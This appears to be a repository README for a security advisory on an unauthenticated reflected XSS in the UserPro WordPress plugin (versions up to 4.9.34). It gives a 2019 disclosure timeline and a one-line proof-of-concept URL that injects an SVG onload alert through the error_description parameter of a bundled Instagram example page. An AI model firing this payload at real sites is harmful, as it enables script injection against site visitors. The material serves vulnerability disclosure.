.. | |||
README.md | Loading last commit info... |
README.md
UserPro <= 4.9.34 - Unauthenticated Reflected XSS
Description
Edit (WPscanTeam):
August 26th, 2019 - Envato Notified
September 2nd, 2019 - v4.9.34 released, still vulnerable
September 24th, 2019 - v4.9.35 and 4.9.35.1 released, fixing the issue
Proof of Concept
/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(/XSS/)%3E